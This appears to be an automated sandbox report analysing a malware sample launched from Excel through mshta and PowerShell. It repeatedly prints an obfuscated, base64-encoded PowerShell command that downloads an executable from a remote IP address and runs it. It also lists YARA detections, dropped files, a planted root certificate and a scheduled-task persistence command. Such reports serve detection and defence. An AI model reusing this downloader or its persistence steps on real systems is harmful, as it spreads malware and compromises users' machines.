Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"

Suspicious powershell command line found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"

Yara detected aPLib compressed binary

Source: Yara match	File source: 31.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.caspol.exe.36cfc30.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.caspol.exe.36e9c50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.caspol.exe.36cfc30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.caspol.exe.36e9c50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.480373676.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.480373676.00000000036CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.501902826.000000000266A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.477095968.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: caspol.exe PID: 3064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rrwscqkDSNwLK.exe PID: 2148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rrwscqkDSNwLK.exe PID: 1988, type: MEMORYSTR

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fkur3fvp\fkur3fvp.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4i1jhsy0\4i1jhsy0.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fkur3fvp\fkur3fvp.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4i1jhsy0\4i1jhsy0.cmdline"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_000007FE899C022D push eax; iretd	4_2_000007FE899C0241
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_000007FE899C00BD pushad ; iretd	4_2_000007FE899C00C1
Source: C:\Users\user\AppData\Roaming\caspol.exe	Code function: 11_2_001C75C0 push eax; retn 0045h	11_2_001C76C9
Source: C:\Users\user\AppData\Roaming\caspol.exe	Code function: 11_2_001C7673 push eax; retn 0045h	11_2_001C76C9
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Code function: 21_2_001D75C8 push eax; retn 0041h	21_2_001D76D1
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Code function: 21_2_001D767B push eax; retn 0041h	21_2_001D76D1
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Code function: 31_2_00402AC0 push eax; ret	31_2_00402AD4
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Code function: 31_2_00402AC0 push eax; ret	31_2_00402AFC
Source: C:\Users\user\AppData\Roaming\caspol.exe	Code function: 38_2_001975C8 push eax; retn 002Bh	38_2_001976D1

Source: caspol[1].exe.4.dr	Static PE information: section name: .text entropy: 7.924032890568231
Source: caspol.exe.4.dr	Static PE information: section name: .text entropy: 7.924032890568231
Source: rrwscqkDSNwLK.exe.11.dr	Static PE information: section name: .text entropy: 7.924032890568231

Source: 11.2.caspol.exe.370e230.3.raw.unpack, nv7TQuQu3ElwogYNXj.cs	High entropy of concatenated method names: 'kwIsqkQ4Rt', 'Dils45fHjB', 'ksMs07h5L2', 'jwvsQSg7TT', 'iZ9soFlRPV', 'uwusHFFDLN', 'uUqsAweIY5', 'qMDsm13UUL', 'evCs7ibb3u', 'wTQsMLXODh'
Source: 11.2.caspol.exe.370e230.3.raw.unpack, RFaVxJDvsI7VbX0rl8.cs	High entropy of concatenated method names: 'd49r8TOJeG', 'qlvrJty0GK', 'IECrVL6mP9', 'wC3rlu6pT8', 'edZrwxKaO9', 'wmsVWJxMJT', 'nJgViubqOf', 'BLHVGX4V2W', 'CUZVuCwxWf', 'XhKVUedFu9'
Source: 11.2.caspol.exe.370e230.3.raw.unpack, LZqk9e1XKPg1FCeZSx.cs	High entropy of concatenated method names: 'qaiAP6BRe1', 'CKLAEy28Or', 'ToString', 'a79Ay4JWyw', 'iZ9AJyunmv', 'vndAsDJ3jY', 'NSMAVZ0nYt', 'xwWArQrxVU', 'bbLAlE71L4', 'TknAwZ99eR'
Source: 11.2.caspol.exe.370e230.3.raw.unpack, fDuVmmOK1PX8TL4smgV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'H9PMXVeJNr', 'ORPMar7pub', 'CmgMf2erEt', 'yfwMtmuVJ4', 'uShMgho4tV', 'LJtMjyo9sR', 'RQ9M1FDccQ'
Source: 11.2.caspol.exe.370e230.3.raw.unpack, EOwDB4zANQSug4vNC0.cs	High entropy of concatenated method names: 'RKxM4S846L', 'htBM0fr1ra', 'FC5MQAfoHf', 'b3nMDxvvmJ', 'nSrMnRKqa6', 'U0uMxovn9e', 'oCVMIvbShl', 'RhxMcBhInt', 'YxmMYwyWqs', 'jWFMkmh4YG'
Source: 11.2.caspol.exe.370e230.3.raw.unpack, NQpbydT9UJ3x7aC7ll.cs	High entropy of concatenated method names: 'm9VlYVZ779', 'hYflkxHXKq', 'JiplSH36wp', 'ipVlq3aL8m', 'SaTl9VKKM6', 'Qrol4dQSrb', 'ppNlRTTVw8', 'QPjl0OQUjS', 'sdLlQKPNNu', 'hEvlpFBNnE'
Source: 11.2.caspol.exe.370e230.3.raw.unpack, zHSLcC0xi2VDKUoIki.cs	High entropy of concatenated method names: 'gqJJt8bpuy', 'chKJgb7VEy', 'fGYJj3jxDJ', 'S8eJ1vvNHX', 'yxrJWbgDoI', 'nKfJi7EYZM', 'kTfJGMHELS', 'jdaJuGbQWu', 'HUQJUSCJAx', 'DMWJ5fVkdg'
Source: 11.2.caspol.exe.370e230.3.raw.unpack, l7WCInZ4VPxOCXSEYv.cs	High entropy of concatenated method names: 'uL8SyuRtP', 'XQ5qnBGp5', 'fdv4KayTV', 'LQZRvMkyl', 'YMWQCB5d3', 'S7xpO8Hqe', 'YlWl3430BFBwncwUKJ', 'GJ4bQqB12ORsZ5dlg2', 'wtimS54KW', 'tdvMDXOFW'
Source: 11.2.caspol.exe.370e230.3.raw.unpack, ejA9J2OOLcg6cn7VOAK.cs	High entropy of concatenated method names: 'OliM5DXEsC', 'LQcMzYbHH4', 'biC3K1MhMe', 'Vgh3OkW19w', 'MyP3Z30MJ1', 'nxD3v3Z1Hj', 'N8L32EXWAv', 'xfj38y71Oe', 'CxC3yJkXsk', 'n6q3JBPlnf'
Source: 11.2.caspol.exe.370e230.3.raw.unpack, WGVBOO5rrSDsqq28a0.cs	High entropy of concatenated method names: 'zxWMsyqmcO', 'xBKMVLK3DL', 'OJEMro5MhQ', 'iyNMltsAmf', 'h2NM7cDQHY', 'Vf3MwJCXCH', 'Next', 'Next', 'Next', 'NextBytes'
Source: 11.2.caspol.exe.370e230.3.raw.unpack, naonpTtnkvVd0Lx6yR.cs	High entropy of concatenated method names: 'fBHoeor5eG', 'p8NoaXobKn', 'gx7otaahjZ', 'CesoglZWn0', 'pxBonEa9WU', 'hEOoBvCaUi', 'X5Joxp8qkk', 'AgMoIqcqpl', 'INRoF0mfpu', 'EbNoChpdo5'
Source: 11.2.caspol.exe.370e230.3.raw.unpack, hhkxhSpONosID7AIZ0.cs	High entropy of concatenated method names: 'OLJV9igeke', 'pCmVRHUUtn', 'DFHsBemItd', 'setsxdwdlk', 'B1fsIM1RWN', 'hnfsFVgF04', 'icGsC6ScTJ', 'Bv2sdZtYj7', 'c83sT8mac4', 'Aeyse4DYml'
Source: 11.2.caspol.exe.370e230.3.raw.unpack, a6RnQjwUyOApqVRoTt.cs	High entropy of concatenated method names: 'GDqv8AQAo0', 'fPWvyw8Gev', 'MilvJcAcrX', 'z6nvsm1HU7', 'GU4vVVp25E', 'P9pvrwHp48', 'ddvvlRvm5B', 'm24vwt17DP', 'VUjvLPeI9X', 'S8lvP4GFHc'
Source: 11.2.caspol.exe.370e230.3.raw.unpack, IJUcGuiXoH6oteQitt.cs	High entropy of concatenated method names: 'W9UAuehVRC', 'F3KA5Ahfle', 'rDCmK6FGoM', 'ENNmOiijkn', 'zFsAXpti6F', 'dAUAa7vK0N', 'H06AfOrhMg', 's5cAtgGihI', 'A1IAgVkTbX', 'r7uAjEfmeo'
Source: 11.2.caspol.exe.370e230.3.raw.unpack, L4oEi92lLXbHukyhd4.cs	High entropy of concatenated method names: 'e5SOlHSLcC', 'Ii2OwVDKUo', 'Wu3OPElwog', 'xNXOEjshkx', 'sAIOoZ0tFa', 'ixJOHvsI7V', 'LCAAOqUlND4diNBGEF', 'U1gjSgECcjRPEDjs6U', 'KrWOOkBTyH', 'jZeOv3QYL3'
Source: 11.2.caspol.exe.370e230.3.raw.unpack, da1BCSJJ6wrPB4DfAI.cs	High entropy of concatenated method names: 'Dispose', 'w4DOU0Ajbi', 'RuEZnReX0k', 'z9kPDVvpk9', 'WpKO5e0Vxg', 'j4sOzjC67c', 'ProcessDialogKey', 'ayoZK0va9o', 'gbAZOZ05HB', 'TPyZZGGVBO'
Source: 11.2.caspol.exe.370e230.3.raw.unpack, vjZivjf2CXinRayulp.cs	High entropy of concatenated method names: 'PF2h02Yl7c', 'A4jhQudmOX', 'D5MhDdOESN', 'uYOhnVtpef', 'L0YhxJhSOS', 'WCMhIslmlM', 'uVyhCGShPX', 'b9BhdL5ilR', 'stYhe5Urux', 't2nhXQ7PEE'
Source: 11.2.caspol.exe.370e230.3.raw.unpack, ISvCPyGxpb4D0AjbiG.cs	High entropy of concatenated method names: 'dKf7oIul6p', 'LRQ7AGZEjR', 'SG377p98xG', 'ppL73NuNCl', 'LHc7NMKubp', 'edC7cv9I79', 'Dispose', 'pXhmy2gEAK', 'wV7mJqTe3d', 'HaXmsHYu5o'
Source: 11.2.caspol.exe.370e230.3.raw.unpack, DgHiCnCAXew4U8UW26.cs	High entropy of concatenated method names: 'YhElyvaAWh', 'DUDlsyoEtP', 'kSOlrjUqwV', 'S2ar5PtZee', 'GITrzURRs1', 'QZYlKJfo8c', 'CVGlOLDgrK', 'BpmlZ6xQng', 'X9Glv89kE8', 'RL1l21qZa0'
Source: 11.2.caspol.exe.370e230.3.raw.unpack, o0va9oUJbAZ05HB1Py.cs	High entropy of concatenated method names: 'dFL7DtW72v', 'BNm7nNf6Rx', 'Nsl7BnCfx6', 'CQF7xqpOIG', 'Ms37ItQKef', 'hBL7FphnQ1', 'mMn7CGROo3', 'qph7dhisEq', 'GWV7TBkMaq', 'BYo7excHLu'

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\fkur3fvp\fkur3fvp.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\caspol.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\caspol.exe	File created: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\caspol.exe	File created: C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\4i1jhsy0\4i1jhsy0.dll	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Roaming\caspol.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmp9F6B.tmp"

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
